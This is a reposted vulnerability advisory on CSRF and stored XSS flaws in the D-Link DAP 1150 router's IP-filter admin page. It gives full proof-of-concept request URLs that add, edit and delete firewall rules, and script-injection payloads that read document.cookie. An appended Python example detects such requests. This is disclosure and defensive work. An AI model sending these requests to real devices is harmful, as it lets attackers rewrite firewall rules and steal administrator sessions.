D-Link DAP 1150 Cross Site Request Forgery / Cross Site Scripting

11 Apr 2014 | Reported by MustLive | Type: packetstorm | Source: packetstormsecurity.com

D-Link DAP 1150 multiple Cross Site Request Forgery and Cross Site Scripting vulnerabilities

Code
`Hello list!  
  
In 2011 and the beginning of 2012 I wrote about multiple vulnerabilities  
(http://securityvulns.ru/docs27440.html,  
http://securityvulns.ru/docs27677.html,  
http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozen).  
At that time I wrote about vulnerabilities in the admin panel in Access Point mode  
and now I'll write about holes in Router mode.  
  
I present new vulnerabilities in this device. There are multiple Cross-Site  
Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150  
(Wi-Fi Access Point and Router).  
  
SecurityVulns ID: 12076.  
  
CSRF (WASC-09):  
  
In section Firewall / IP-filters via CSRF it's possible to add, edit and  
delete settings of IP-filters.  
  
Add:  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=-1  
  
Edit:  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0  
  
Delete:  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=88&res_pos=0  
  
XSS (WASC-08):  
  
These are persistent XSS. The code will execute in section Firewall /  
IP-filters.  
  
Attack via add function in parameter res_buf (in fields: Name, IP Addresses  
Source, Destination, Ports Source, Destination).  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22portd%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ipd%22:%22192.168.1.2/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22}&res_pos=-1  
  
Attack via edit function in parameter res_buf (in field Name, but not in  
other fields).  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0  
  
The following model is vulnerable: D-Link DAP 1150, Firmware version 1.2.94. This  
model with other firmware versions also must be vulnerable. D-Link ignored  
all vulnerabilities in this device (as in other devices, which I informed  
them about) and still didn't fix them.  
  
I mentioned these vulnerabilities on my site  
(http://websecurity.com.ua/7095/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`
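
The requests in the advisory share one shape: a state-changing call to `index.cgi` carrying `res_config_action`, with the rule fields packed as JSON in `res_buf`. The following is an added example, not code from the advisory or from D-Link, showing how a reverse proxy or log review script could flag both problems. The function names, the allow-list patterns for names and ports, and the use of the Referer header as a cross-origin signal are assumptions made for this illustration.

```python
import ipaddress
import json
import re
from urllib.parse import parse_qs, urlsplit

PORT_RE = re.compile(r"^\d{1,5}(-\d{1,5})?$")      # assumed syntax: "80" or "80-90"
NAME_RE = re.compile(r"^[A-Za-z0-9 _.-]{1,32}$")   # assumed allow-list for rule names

def _is_cidr(value):
    """True if value parses as an IPv4/IPv6 address or network."""
    try:
        ipaddress.ip_network(value, strict=False)
        return True
    except ValueError:
        return False

def check_request(method, url, referer, device_origin="http://192.168.0.50"):
    """Return findings for one admin-panel request; an empty list means clean."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    if not parts.path.endswith("/index.cgi") or "res_config_action" not in query:
        return []  # not a configuration-changing call
    findings = []
    # CSRF indicators: state change over GET, or a request that did not
    # originate from a page served by the device itself.
    if method.upper() == "GET":
        findings.append("state-change-over-GET")
    if not referer or not referer.startswith(device_origin + "/"):
        findings.append("cross-origin-or-missing-referer")
    # Stored XSS indicators: res_buf fields that do not match what the
    # IP-filters form is expected to hold.
    raw = query.get("res_buf", [None])[0]
    if raw is None:
        return findings  # e.g. the delete call carries no rule body
    try:
        rule = json.loads(raw)
    except ValueError:
        return findings + ["res_buf-not-json"]
    if not isinstance(rule, dict):
        return findings + ["res_buf-not-object"]
    checks = {"name": NAME_RE.match, "ports": PORT_RE.match,
              "portd": PORT_RE.match, "ips": _is_cidr, "ipd": _is_cidr}
    for field, is_valid in checks.items():
        value = rule.get(field)
        if not isinstance(value, str) or not is_valid(value):
            findings.append(f"bad-field:{field}")
    return findings
```

Validation of this kind only narrows what gets stored; the device would still need per-session anti-CSRF tokens and output encoding when rendering the IP-filters table.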
